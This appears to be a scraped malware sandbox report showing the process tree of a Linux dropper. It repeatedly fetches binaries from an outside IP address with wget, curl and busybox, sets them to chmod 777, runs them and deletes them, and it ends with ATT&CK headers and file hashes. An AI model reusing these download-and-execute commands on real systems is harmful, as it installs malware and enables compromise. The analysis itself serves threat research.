/usr/bin/wgetwget http://87.120.125.191/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:879
-
-
/bin/chmodchmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:885
-
-
/bin/chmodchmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:891
-
-
/bin/chmodchmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:897
-
-
/bin/chmodchmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:903
-
-
/bin/chmodchmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:912
-
-
/bin/chmodchmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵PID:918
-
-
/bin/chmodchmod 777 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc./yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵PID:924
-
-
/bin/chmodchmod 777 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX./SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵PID:930
-
-
/bin/chmodchmod 777 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5./ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵PID:936
-
-
/bin/chmodchmod 777 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm./ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵PID:939
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97